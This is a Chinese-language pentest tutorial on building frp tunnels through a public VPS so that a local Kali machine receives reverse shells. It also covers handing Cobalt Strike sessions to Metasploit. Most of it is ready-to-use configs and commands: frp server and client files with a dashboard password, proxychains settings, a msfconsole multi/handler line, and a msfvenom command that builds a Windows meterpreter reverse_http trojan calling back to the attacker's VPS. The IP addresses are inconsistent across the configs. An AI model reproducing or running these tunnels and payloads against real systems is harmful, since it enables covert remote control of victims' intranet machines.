这篇文章介绍如何使用frp建立端口转发实现本地kali在公网ssh、本地msf在公网反弹shell;已经上线CS怎么联动本地msf
linux版在kali用,windows版在\/ps用
vi /etc/proxychains4.conf
socks5 1.166.166.6 7777
使用的时候可以在命令前加proxychains
setg Proxies socks5:1.166.166.6:7777
setg ReverseAllowProxy true
使用Proxifier工具
[common]
bind_addr = 0.0.0.0
bind_port = 7000
运行
frps.exe -c frps.ini
# frpc.ini
[common]
server_addr = 1.166.166.6
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5
运行
frpc.exe -c frpc.ini
在环境中,\/PS起到了桥梁的作用,使得两个内网可以相互通信
1.1 攻击目标内网
1.2 攻击桥梁\/PS(windows),ip:1.166.166.6
1.3 本地机器kali linux,ip:10.1.0.4
1.4 工具:frp
\/PS为服务端,假设ip为1.166.166.6
将下载的文件放在\/ps,编辑frps.ini文件配置
[common]
bind_port = 60121
dashboard_port = 88
dashboard_user = admin
dashboard_pwd = zcv2!#sWE3x
参数说明:
[common] # 名字
bind_port = port # 指的是frp的服务端端口,用来和客户端kali建立连接
dashboard_port = port # 可视化监控平台的端口,访问这个端口会得到一个网页版的监控
# http://1.166.166.6:88
dashboard_user = admin # 网页版的登录用户名
dashboard_pwd = zcv2!#sWE3x # 网页版的登录密码
配置好之后保存,进行运行
frps.exe -c frps.ini
将文件放进kali,解压命令
tar -zxvf frp_0.36.2_linux_amd64.tar.gz
配置kali,让在本地内网的kali,也能使用公网的IP进行访问,客户端的配置文件为frpc.ini
[common]
server_addr = 1.15.107.44
server_port = 60121[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 60122
use_compression = true[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 1234
remote_port = 60123
参数说明
[common]名称
server_addr = 1.166.166.6 # 服务器IP
server_port = 60121 # \/PS的端口,用来建立连接[ssh] # 配置ssh登录的端口转发
type = tcp # 连接方式为TCP的方式
local_ip = 127.0.0.1 # 将本地的IP映射出去
local_port = 22 # 本地的端口为22
remote_port = 60122 # 映射的端口为60122,本地端口22映射到\/PS的60122
use_compression = true[msf] # 配置msf的监听端口转发
type = tcp # 连接方式
local_ip = 127.0.0.1 # 本地IP
local_port = 1234 # 监听本地的端口
remote_port = 60123 # 映射的\/PS端口为60123,本地端口1234映射到\/PS的60123
在kali中运行
./frpc -c frpc.ini
访问http://1.166.166.6:88,输入用户名密码登录
可以观察到流量的情况
ssh远程kali,前提是kali开启了远程连接
将CS已上线的机器进行反弹到本地MSF
点击Save保存
由于上面frpc.ini配置的msf的1234端口映射到\/ps的60123
所以应该监听本地的1234端口,这里要写reverse_http,与CS对应
msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -j; "
MSF上线!
msfvenom -p windows/meterpreter/reverse_http LHOST=1.15.107.44 LPORT=60123 -f exe > zf.exe
因为生成的木马由内网机器运行,内网机器只能访问\/PS,不能直接访问本地的kali,所以LHOST是\/ps,LPORT也是kali映射到\/ps的端口
这里和CS联动msf的时候一样
设置监听的时候要考虑:1234是本地监听的端口,60123是\/ps的端口,60123的数据转发到kali的1234
msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -j; "
kali上线
内网渗透中隧道时必不可少的,frp搭建隧道相对比较稳定,功能也更加强大,常用的还有EW,都可以进行多级代理
http://cn-sec.com/archives/80364.html